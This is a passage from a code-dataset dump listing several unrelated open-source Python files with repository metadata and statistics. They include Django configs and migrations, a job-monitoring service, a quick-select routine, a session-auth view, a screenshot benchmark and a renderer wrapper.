| 23.488636 | 71 | 0.562651 | 265 | 2,067 | 4.260377 | 0.384906 | 0.053144 | 0.024801 | 0.031887 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022711 | 0.339623 | 2,067 | 87 | 72 | 23.758621 | 0.804396 | 0.221577 | 0 | 0.081633 | 0 | 0 | 0.059345 | 0 | 0 | 0 | 0 | 0.011494 | 0 | 1 | 0.040816 | false | 0 | 0.081633 | 0 | 0.122449 | 0.061224 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21f6ac953977adb43d4446f137f14e3d19478056 | 285 | py | Python | dist/urls.py | tfmt/netboot | abd690d463dfd14488b0d295512d61ce5c5bc97d | [
"Apache-2.0"
] | null | null | null | dist/urls.py | tfmt/netboot | abd690d463dfd14488b0d295512d61ce5c5bc97d | [
"Apache-2.0"
] | null | null | null | dist/urls.py | tfmt/netboot | abd690d463dfd14488b0d295512d61ce5c5bc97d | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import url
from dist import views
urlpatterns = [
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^add$', views.AddCategoryView.as_view(), name='add_category'),
url(r'^(?P<cat_id>\d+)/$', views.CategoryView.as_view(), name='category'),
]
| 28.5 | 78 | 0.663158 | 41 | 285 | 4.487805 | 0.560976 | 0.065217 | 0.163043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122807 | 285 | 9 | 79 | 31.666667 | 0.736 | 0 | 0 | 0 | 0 | 0 | 0.175439 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21f9319e8b6fa0bf2f0d17cbb3ff738368d5fe28 | 358 | py | Python | advanced/react-django/APITestProject/api/migrations/0002_auto_20210110_0406.py | rocabrera/python-learning | 578b6f6f64a59039956e2ff8eca9eb486127722f | [
"MIT"
] | 3 | 2021-04-16T01:30:05.000Z | 2021-07-22T21:00:45.000Z | advanced/react-django/APITestProject/api/migrations/0002_auto_20210110_0406.py | rocabrera/python-learning | 578b6f6f64a59039956e2ff8eca9eb486127722f | [
"MIT"
] | null | null | null | advanced/react-django/APITestProject/api/migrations/0002_auto_20210110_0406.py | rocabrera/python-learning | 578b6f6f64a59039956e2ff8eca9eb486127722f | [
"MIT"
] | null | null | null | # Generated by Django 3.1.5 on 2021-01-10 04:06
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='article',
old_name='descripton',
new_name='description',
),
]
| 18.842105 | 47 | 0.578212 | 37 | 358 | 5.486486 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076613 | 0.307263 | 358 | 18 | 48 | 19.888889 | 0.741935 | 0.125698 | 0 | 0 | 1 | 0 | 0.138264 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21f9b7045b329df6f1fc9828f5e918547ef50c4d | 917 | py | Python | core/dbt/perf_utils.py | dcereijodo/dbt | 204fc25c2168710d2549515ffe4846880b89fdec | [
"Apache-2.0"
] | 1 | 2021-04-08T03:33:33.000Z | 2021-04-08T03:33:33.000Z | core/dbt/perf_utils.py | azhard/dbt | 9cd7cbc9e35e5a7c8c4f17a3d113263f4421ab55 | [
"Apache-2.0"
] | 1 | 2021-04-30T21:33:11.000Z | 2021-04-30T21:33:11.000Z | core/dbt/perf_utils.py | azhard/dbt | 9cd7cbc9e35e5a7c8c4f17a3d113263f4421ab55 | [
"Apache-2.0"
] | 1 | 2021-06-04T16:00:44.000Z | 2021-06-04T16:00:44.000Z | """A collection of performance-enhancing functions that have to know just a
little bit too much to go anywhere else.
"""
from dbt.adapters.factory import get_adapter
from dbt.parser.manifest import load_manifest
from dbt.contracts.graph.manifest import Manifest
from dbt.config import RuntimeConfig
def get_full_manifest(config: RuntimeConfig) -> Manifest:
"""Load the full manifest, using the adapter's internal manifest if it
exists to skip parsing internal (dbt + plugins) macros a second time.
Also, make sure that we force-load the adapter's manifest, so it gets
attached to the adapter for any methods that need it.
"""
adapter = get_adapter(config) # type: ignore
internal: Manifest = adapter.load_internal_manifest()
def set_header(manifest: Manifest) -> None:
adapter.connections.set_query_header(manifest)
return load_manifest(config, internal, set_header)
| 38.208333 | 75 | 0.760087 | 131 | 917 | 5.229008 | 0.519084 | 0.040876 | 0.043796 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.17121 | 917 | 23 | 76 | 39.869565 | 0.901316 | 0.4253 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
21fc6b78c90650153fe0a66ddcecb6e108d72054 | 367 | py | Python | apc/apc/apc_config.py | jmsung/APC | 9f0e065aa748a4d041b783b07cd8078715d39625 | [
"MIT"
] | null | null | null | apc/apc/apc_config.py | jmsung/APC | 9f0e065aa748a4d041b783b07cd8078715d39625 | [
"MIT"
] | null | null | null | apc/apc/apc_config.py | jmsung/APC | 9f0e065aa748a4d041b783b07cd8078715d39625 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 13 11:30:05 2019
@author: Jongmin Sung
"""
# config.py
import os
from pathlib import Path
from inspect import currentframe, getframeinfo
fname = getframeinfo(currentframe()).filename # current file name
current_dir = Path(fname).resolve().parent
data_dir = Path(fname).resolve().parent.parent.parent/'data'
| 16.681818 | 65 | 0.716621 | 50 | 367 | 5.22 | 0.68 | 0.05364 | 0.091954 | 0.145594 | 0.191571 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041801 | 0.152589 | 367 | 21 | 66 | 17.47619 | 0.797428 | 0.297003 | 0 | 0 | 0 | 0 | 0.016461 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
21fe43d98daef7dd3ebf40de9036c681e2844778 | 8,798 | py | Python | balsam/management/commands/balsam_service.py | hep-cce/hpc-edge-service | 57f2b9252d21d478eabe06cbdced5b623f08c75f | [
"BSD-3-Clause"
] | null | null | null | balsam/management/commands/balsam_service.py | hep-cce/hpc-edge-service | 57f2b9252d21d478eabe06cbdced5b623f08c75f | [
"BSD-3-Clause"
] | null | null | null | balsam/management/commands/balsam_service.py | hep-cce/hpc-edge-service | 57f2b9252d21d478eabe06cbdced5b623f08c75f | [
"BSD-3-Clause"
] | null | null | null | import os,sys,logging,multiprocessing,Queue,traceback
logger = logging.getLogger(__name__)
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from balsam import models,BalsamJobReceiver,QueueMessage
from common import DirCleaner,log_uncaught_exceptions,TransitionJob
from balsam import scheduler
from balsam.schedulers import exceptions,jobstates
# assign this function to the system exception hook
sys.excepthook = log_uncaught_exceptions.log_uncaught_exceptions
class Command(BaseCommand):
help = 'Start Balsam Service, which monitors the message queue for new jobs and submits them to the local batch system.'
logger.info('''
>>>>> Starting Balsam Service <<<<<
>>>>> pid: ''' + str(os.getpid()) + ''' <<<<<
''')
def handle(self, *args, **options):
try:
logger.debug('starting BalsamJobReceiver')
subprocesses = {}
# start the balsam job receiver in separate thread
try:
p = BalsamJobReceiver.BalsamJobReceiver()
p.start()
subprocesses['BalsamJobReceiver'] = p
except Exception,e:
logger.exception(' Received Exception while trying to start job receiver: ' + str(e))
raise
# setup timer for cleaning the work folder of old files
logger.debug('creating DirCleaner')
workDirCleaner = DirCleaner.DirCleaner(settings.BALSAM_WORK_DIRECTORY,
settings.BALSAM_DELETE_OLD_WORK_PERIOD,
settings.BALSAM_DELETE_OLD_WORK_AGE,
)
# create the balsam service queue which subprocesses use to communicate
# back to the service. It is also used to wake up the while-loop
logger.debug('creating balsam_service_queue')
balsam_service_queue = multiprocessing.Queue()
jobs_in_transition_by_id = {}
# this is the loop that never ends, yes it goes on and on my friends...
while True:
logger.debug('begin service loop ')
# loop over queued jobs and check their status
# also look for jobs that have been submitted but are not in the queued or running state, which
# may mean they have finished or exited.
logger.debug( ' checking for active jobs ')
active_jobs = models.BalsamJob.objects.filter(state__in = models.CHECK_STATUS_STATES)
if len(active_jobs) > 0:
logger.info( 'monitoring ' + str(len(active_jobs)) + ' active jobs')
else:
logger.debug(' no active jobs')
for job in active_jobs:
# update job's status
try:
jobstate = scheduler.get_job_status(job)
if jobstate == jobstates.JOB_RUNNING and job.state != models.RUNNING.name:
job.state = models.RUNNING.name
elif jobstate == jobstates.JOB_QUEUED and job.state != models.QUEUED.name:
job.state = models.QUEUED.name
elif jobstate == jobstates.JOB_FINISHED and job.state != models.EXECUTION_FINISHED.name:
job.state = models.EXECUTION_FINISHED.name
#scheduler.postprocess(job) <<< check on this...
else:
logger.debug('job pk=' + str(job.pk) + ' remains in state ' + str(jobstate))
continue # jump to next job, skip remaining actions
job.save(update_fields=['state'])
models.send_status_message(job,'Job entered ' + job.state + ' state')
except exceptions.JobStatusFailed,e:
message = 'get_job_status failed for pk='+str(job.pk)+': ' + str(e)
logger.error(message)
# TODO: Should I fail the job?
models.send_status_message(job,message)
except Exception,e:
message = 'failed to get status for pk='+str(job.pk)+', exception: ' + str(e)
logger.error(message)
# TODO: Should I fail the job?
models.send_status_message(job,message)
# first loop over jobs in transition and remove entries that are complete
for pk in jobs_in_transition_by_id.keys():
proc = jobs_in_transition_by_id[pk]
if not proc.is_alive():
# did subprocess exit cleanly with exitcode == 0
if proc.exitcode != 0:
logger.error('transition subprocess for pk=' + str(pk)
+ ' returned exit code ' + str(proc.exitcode))
# probably want to do other things to recover from error?
del jobs_in_transition_by_id[pk]
# see if any jobs are ready to transition, but exclude jobs already in transition
transitionable_jobs = models.BalsamJob.objects.filter(state__in=models.TRANSITIONABLE_STATES).exclude(pk__in=jobs_in_transition_by_id.keys())
logger.debug( ' found ' + str(len(transitionable_jobs)) + ' in states that need to be transitioned ')
# loop over jobs and transition
for job in transitionable_jobs:
# place a limit on the number of concurrent threads to avoid overloading CPU
if len(jobs_in_transition_by_id) < settings.BALSAM_MAX_CONCURRENT_TRANSITIONS:
logger.debug(' creating job transition ')
proc = TransitionJob.TransitionJob(
job.pk,
balsam_service_queue,
models.BalsamJob,
models.STATES_BY_NAME[job.state].transition_function
)
logger.debug(' start ')
proc.start()
jobs_in_transition_by_id[job.pk] = proc
else:
logger.debug(' too many jobs currently transitioning '
+ str(len(jobs_in_transition_by_id)) + ' and max is '
+ str(settings.BALSAM_MAX_CONCURRENT_TRANSITIONS))
# clean work directory periodically
if settings.BALSAM_DELETE_OLD_WORK:
workDirCleaner.clean()
# loop over running process and check status
for name,proc in subprocesses.iteritems():
if not proc.is_alive():
logger.info(' subprocess ' + name + ' has stopped with returncode ' + str(proc.exitcode) )
# block on getting message from the queue where subprocesses will send messages
try:
logger.debug('getting message from queue, blocking for '
+ str(settings.BALSAM_SERVICE_PERIOD) + ' seconds')
qmsg = balsam_service_queue.get(block=True,timeout=settings.BALSAM_SERVICE_PERIOD)
# act on messages
logger.debug('Received queue message code: ' + QueueMessage.msg_codes[qmsg.code])
logger.debug('Received queue message: ' + qmsg.message)
if qmsg.code == QueueMessage.TransitionComplete:
logger.debug('Transition Succeeded')
elif qmsg.code == QueueMessage.TransitionDbConnectionFailed:
logger.error('Transition DB connection failed: ' + qmsg.message)
job = models.BalsamJob.objects.get(pk=qmsg.pk)
job.state = models.STATE_BY_NAME[job.state].failed_state
job.save(update_fields=['state'])
elif qmsg.code == QueueMessage.TransitionDbRetrieveFailed:
logger.error('Transition failed to retrieve job from DB: ' + qmsg.message)
job = models.BalsamJob.objects.get(pk=qmsg.pk)
job.state = models.STATE_BY_NAME[job.state].failed_state
job.save(update_fields=['state'])
elif qmsg.code == QueueMessage.TransitionFunctionException:
logger.error('Exception received while running transition function: ' + qmsg.message)
job = models.BalsamJob.objects.get(pk=qmsg.pk)
job.state = models.STATE_BY_NAME[job.state].failed_state
job.save(update_fields=['state'])
else:
logger.error('No recognized QueueMessage code')
except Queue.Empty,e:
logger.debug('no messages on queue')
logger.info(' Balsam Service Exiting ')
except KeyboardInterrupt,e:
logger.info('Balsam Service Exiting')
return
| 50.855491 | 153 | 0.587406 | 949 | 8,798 | 5.316122 | 0.270811 | 0.034886 | 0.028543 | 0.028543 | 0.28226 | 0.168682 | 0.136967 | 0.136967 | 0.108028 | 0.108028 | 0 | 0.000512 | 0.333712 | 8,798 | 172 | 154 | 51.151163 | 0.860116 | 0.140145 | 0 | 0.224 | 0 | 0.008 | 0.152142 | 0 | 0 | 0 | 0 | 0.005814 | 0 | 0 | null | null | 0 | 0.056 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1d0099bd08d14b67316e62ac1133b0502a7f11ee | 369 | py | Python | jts/backend/review/migrations/0003_auto_20191011_1025.py | goupaz/babylon | 4e638d02705469061e563fec349676d8faa9f648 | [
"MIT"
] | 1 | 2019-08-08T09:03:17.000Z | 2019-08-08T09:03:17.000Z | backend/review/migrations/0003_auto_20191011_1025.py | goupaz/website | ce1bc8b6c52ee0815a7b98842ec3bde0c20e0add | [
"Apache-2.0"
] | 2 | 2020-10-09T19:16:09.000Z | 2020-10-10T20:40:41.000Z | jts/backend/review/migrations/0003_auto_20191011_1025.py | goupaz/babylon-hackathon | 4e638d02705469061e563fec349676d8faa9f648 | [
"MIT"
] | 1 | 2019-07-21T01:42:21.000Z | 2019-07-21T01:42:21.000Z | # Generated by Django 2.2 on 2019-10-11 17:25
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('review', '0002_auto_20191009_1119'),
]
operations = [
migrations.RenameField(
model_name='review',
old_name='is_deleted',
new_name='is_rejected',
),
]
| 19.421053 | 46 | 0.593496 | 40 | 369 | 5.275 | 0.775 | 0.056872 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.11583 | 0.298103 | 369 | 18 | 47 | 20.5 | 0.698842 | 0.116531 | 0 | 0 | 1 | 0 | 0.17284 | 0.070988 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1d058aadd2ea53eaf7bc8c3792809f3c95cbd8ca | 2,056 | py | Python | algorithms_in_python/_12_sorting_and_selection/examples/quick_select.py | junteudjio/algorithms_in_python | 90ceced09828aedf845605e5236f48ea92a4419e | [
"MIT"
] | null | null | null | algorithms_in_python/_12_sorting_and_selection/examples/quick_select.py | junteudjio/algorithms_in_python | 90ceced09828aedf845605e5236f48ea92a4419e | [
"MIT"
] | null | null | null | algorithms_in_python/_12_sorting_and_selection/examples/quick_select.py | junteudjio/algorithms_in_python | 90ceced09828aedf845605e5236f48ea92a4419e | [
"MIT"
] | 1 | 2018-10-15T06:28:45.000Z | 2018-10-15T06:28:45.000Z | from random import shuffle
__author__ = 'Junior Teudjio'
def quick_select(l, k, find_largest=True):
"""
return the k_th largest/smallest element of list l
Parameters
----------
l : list
k : int
find_largest : Boolean
True if return the k_th largest element False if return the k-th smallest element
Returns
-------
element of list l
"""
def _partition(l, pivot, left, right):
i,j = left + 1, right-1
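# Hoare-style scan: i moves right past elements <= pivot, j moves left past elements > pivot, and out-of-place pairs are swapped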
while i <= j:
while i <= j:
if l[i] <= pivot:
i += 1
else:
break
while i <= j:
if pivot < l[j]:
j -= 1
else:
break
# if the two pointers have not crossed, swap the out-of-place pair and advance both pointers
if i <= j:
l[j], l[i] = l[i], l[j]
i += 1
j -= 1
l[left], l[j] = l[j], l[left]  # move the pivot into its final sorted position before reporting it
return j
def _quick_select(l, k, left, right):
pivot = l[left]
pivot_new_position = _partition(l, pivot, left, right)
if pivot_new_position == k-1:
return pivot_new_position
elif k-1 < pivot_new_position:
return _quick_select(l, k, left, pivot_new_position)
else:
return _quick_select(l, k, pivot_new_position+1, right)
if len(l) == 0 or k == 0 or len(l) < k:
return None
# shuffle the list to make sure the partition steps doesn't take 0(n) time if the list is 'almost' sorted
shuffle(l)
if find_largest:
    # the k-th largest element is the (len(l) - k + 1)-th smallest one
    k = len(l) - k + 1
_quick_select(l, k, left=0, right=len(l))
return l[k - 1]
def find_median(l):
return quick_select(l, len(l)//2)
if __name__ == '__main__':
l = range(100)
print quick_select(l, 1, find_largest=False)
print quick_select(l, 5, find_largest=True)
print quick_select(l, 54, find_largest=False)
print quick_select(l, 1, find_largest=True)
print find_median(l) | 28.164384 | 109 | 0.548638 | 293 | 2,056 | 3.65529 | 0.266212 | 0.102708 | 0.112045 | 0.060691 | 0.273576 | 0.089636 | 0.089636 | 0 | 0 | 0 | 0 | 0.017332 | 0.354572 | 2,056 | 73 | 110 | 28.164384 | 0.789751 | 0.089494 | 0 | 0.276596 | 0 | 0 | 0.013871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.021277 | null | null | 0.106383 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1d0a47a3797d1d7c500c16f2bd41153122397e81 | 1,187 | py | Python | rest_framework_sav/views.py | JamesRitchie/django-rest-framework-session-endpoint | a968129be88a1981d9904c3679e5fdd9490e890d | [
"BSD-2-Clause"
] | 21 | 2015-03-04T09:25:47.000Z | 2019-11-08T14:19:24.000Z | rest_framework_sav/views.py | JamesRitchie/django-rest-framework-session-endpoint | a968129be88a1981d9904c3679e5fdd9490e890d | [
"BSD-2-Clause"
] | 1 | 2015-03-04T09:26:17.000Z | 2015-03-11T13:10:20.000Z | rest_framework_sav/views.py | JamesRitchie/django-rest-framework-session-endpoint | a968129be88a1981d9904c3679e5fdd9490e890d | [
"BSD-2-Clause"
] | 1 | 2020-05-17T04:16:27.000Z | 2020-05-17T04:16:27.000Z | """Views for Django Rest Framework Session Endpoint extension."""
from django.contrib.auth import login, logout
from rest_framework import parsers, renderers
from rest_framework.authtoken.serializers import AuthTokenSerializer
from rest_framework.response import Response
from rest_framework.views import APIView
class SessionAuthView(APIView):
"""Provides methods for REST-like session authentication."""
throttle_classes = ()
permission_classes = ()
parser_classes = (
parsers.FormParser,
parsers.MultiPartParser,
parsers.JSONParser
)
renderer_classes = (renderers.JSONRenderer,)
def post(self, request):
"""Login using posted username and password."""
serializer = AuthTokenSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = serializer.validated_data['user']
login(request, user)
return Response({'detail': 'Session login successful.'})
def delete(self, request):
"""Logout the current session."""
logout(request)
return Response({'detail': 'Session logout successful.'})
session_auth_view = SessionAuthView.as_view()
| 30.435897 | 68 | 0.711879 | 123 | 1,187 | 6.756098 | 0.504065 | 0.078219 | 0.081829 | 0.064982 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.194608 | 1,187 | 38 | 69 | 31.236842 | 0.869247 | 0.155013 | 0 | 0 | 0 | 0 | 0.068228 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.208333 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
df0469beb5c62575548fc779498cc9b3a9cc1490 | 1,547 | py | Python | tests/bench_bgra2rgb.py | RedFantom/python-mss | 7e26de184b1e6a0800231b01451f794087a76f73 | [
"MIT"
] | null | null | null | tests/bench_bgra2rgb.py | RedFantom/python-mss | 7e26de184b1e6a0800231b01451f794087a76f73 | [
"MIT"
] | null | null | null | tests/bench_bgra2rgb.py | RedFantom/python-mss | 7e26de184b1e6a0800231b01451f794087a76f73 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
2018-03-19.
Maximum screenshots in 1 second by computing BGRA raw values to RGB.
GNU/Linux
pil_frombytes 139
mss_rgb 119
pil_frombytes_rgb 51
numpy_flip 31
numpy_slice 29
macOS
pil_frombytes 209
mss_rgb 174
pil_frombytes_rgb 113
numpy_flip 39
numpy_slice 36
Windows
pil_frombytes 81
mss_rgb 66
pil_frombytes_rgb 42
numpy_flip 25
numpy_slice 22
"""
from __future__ import print_function
import time
import numpy
from PIL import Image
import mss
def mss_rgb(im):
return im.rgb
def numpy_flip(im):
frame = numpy.array(im, dtype=numpy.uint8)
return numpy.flip(frame[:, :, :3], 2).tobytes()
def numpy_slice(im):
return numpy.array(im, dtype=numpy.uint8)[..., [2, 1, 0]].tobytes()
def pil_frombytes_rgb(im):
return Image.frombytes('RGB', im.size, im.rgb).tobytes()
def pil_frombytes(im):
return Image.frombytes('RGB', im.size, im.bgra, 'raw', 'BGRX').tobytes()
def benchmark():
with mss.mss() as sct:
im = sct.grab(sct.monitors[0])
for func in (pil_frombytes,
mss_rgb,
pil_frombytes_rgb,
numpy_flip,
numpy_slice):
count = 0
start = time.time()
while (time.time() - start) <= 1:
func(im)
im._ScreenShot__rgb = None
count += 1
print(func.__name__.ljust(17), count)
benchmark()
| 19.582278 | 76 | 0.580478 | 206 | 1,547 | 4.15534 | 0.383495 | 0.140187 | 0.087617 | 0.03972 | 0.140187 | 0.140187 | 0.077103 | 0.077103 | 0 | 0 | 0 | 0.055344 | 0.32256 | 1,547 | 78 | 77 | 19.833333 | 0.76145 | 0.306399 | 0 | 0 | 0 | 0 | 0.012207 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.15625 | 0.125 | 0.5 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
df0b8deb7b8139e6384b8790377b34bff7533519 | 2,725 | py | Python | ACME/render/renderer.py | mauriziokovacic/ACME | 2615b66dd4addfd5c03d9d91a24c7da414294308 | [
"MIT"
] | 3 | 2019-10-23T23:10:55.000Z | 2021-09-01T07:30:14.000Z | ACME/render/renderer.py | mauriziokovacic/ACME-Python | 2615b66dd4addfd5c03d9d91a24c7da414294308 | [
"MIT"
] | null | null | null | ACME/render/renderer.py | mauriziokovacic/ACME-Python | 2615b66dd4addfd5c03d9d91a24c7da414294308 | [
"MIT"
] | 1 | 2020-07-11T11:35:43.000Z | 2020-07-11T11:35:43.000Z | import neural_renderer as nr
from ..math.unitvec import *
class Renderer(nr.Renderer):
"""
A class extending the Neural Renderer
Attributes
----------
device : str or torch.device (optional)
the device the renderer's tensors will be stored to (default is 'cuda:0')
culling : str (optional)
the current active face culling (default is None)
Methods
-------
toggle_lighting(status)
toggles the renderer directional lighting on or off depending on status
enable_lighting()
enables the renderer lighting
disable_lighting()
disables the renderer lighting
disable_culling()
disables face culling
enable_back_culling()
enables back face culling
enable_front_culling()
enables front face culling
"""
def __init__(self, device='cuda:0', culling=None, lighting=False, **kwargs):
"""
Parameters
----------
device : str or torch.device (optional)
the device the tensors will be stored to (default is 'cuda:0')
culling : str (optional)
the current active face culling, either 'front' or 'back'.
If None no culling is performed (default is None)
lighting : bool (optional)
if True activates the lighting, False otherwise
**kwargs : ...
the Neural Renderer keyworded arguments
"""
super(Renderer, self).__init__(camera_mode='look_at', **kwargs)
self.eye = unitvec(3, 0, device=device)
self.light_direction = -self.eye
self.device = device
self.culling = culling
self.toggle_lighting(lighting)
def toggle_lighting(self, status):
"""
Toggles the renderer directional lighting on or off depending on status
Parameters
----------
status : bool
the lighting status
"""
if status:
self.light_intensity_directional = 0.5
else:
self.light_intensity_directional = 0
self.light_intensity_ambient = 1-self.light_intensity_directional
def enable_lighting(self):
"""Enables the renderer lighting"""
self.toggle_lighting(True)
def disable_lighting(self):
"""Disables the renderer lighting"""
self.toggle_lighting(False)
def disable_culling(self):
"""Disables face culling"""
self.culling = None
def enable_back_culling(self):
"""
Enables back face culling
"""
self.culling = 'back'
def enable_front_culling(self):
"""
Enables front face culling
"""
self.culling = 'front'
| 27.806122 | 80 | 0.601468 | 296 | 2,725 | 5.405405 | 0.263514 | 0.055 | 0.0475 | 0.054375 | 0.3 | 0.2625 | 0.21625 | 0.175 | 0.175 | 0.175 | 0 | 0.004787 | 0.310092 | 2,725 | 97 | 81 | 28.092784 | 0.846277 | 0.47633 | 0 | 0 | 0 | 0 | 0.019784 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.269231 | false | 0 | 0.076923 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df0c4609dc3d7030697a254872dda6cfb67438db | 641 | py | Python | setup.py | Wirtos/aioregex | b426fb99769d54d627e189bd058c4b724559fb80 | [
"MIT"
] | null | null | null | setup.py | Wirtos/aioregex | b426fb99769d54d627e189bd058c4b724559fb80 | [
"MIT"
] | null | null | null | setup.py | Wirtos/aioregex | b426fb99769d54d627e189bd058c4b724559fb80 | [
"MIT"
] | null | null | null | import setuptools
setuptools.setup(
name="aioregex",
version="0.1",
author="Wirtos_new",
author_email="Wirtos.new@gmail.com",
description="regex to allow both sync and async callables in the sub as repl",
url="https://wirtos.github.io/aioregex/",
packages=setuptools.find_packages(),
project_urls={
"Source Code": "https://github.com/Wirtos/aioregex",
},
install_requires=[],
keywords="regex re asyncio aioregex",
classifiers=[
"Programming Language :: Python :: >=3.5",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| 29.136364 | 82 | 0.639626 | 73 | 641 | 5.547945 | 0.780822 | 0.044444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007952 | 0.215289 | 641 | 21 | 83 | 30.52381 | 0.797217 | 0 | 0 | 0 | 0 | 0 | 0.49766 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.05 | 0 | 0.05 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df144e0efba2d31bbcba42a1f4cb228efa1dd83b | 406 | py | Python | electrum/networks/auxpow_mixin.py | ZenyattaAbosom/AbosomElectrum | 02748b0b14e37385d6e77591d122e592740222bf | [
"MIT"
] | 4 | 2020-06-27T22:43:34.000Z | 2021-04-12T02:29:30.000Z | electrum/networks/auxpow_mixin.py | ZenyattaAbosom/AbosomElectrum | 02748b0b14e37385d6e77591d122e592740222bf | [
"MIT"
] | 21 | 2020-06-20T15:02:50.000Z | 2021-04-07T10:14:59.000Z | electrum/networks/auxpow_mixin.py | ZenyattaAbosom/AbosomElectrum | 02748b0b14e37385d6e77591d122e592740222bf | [
"MIT"
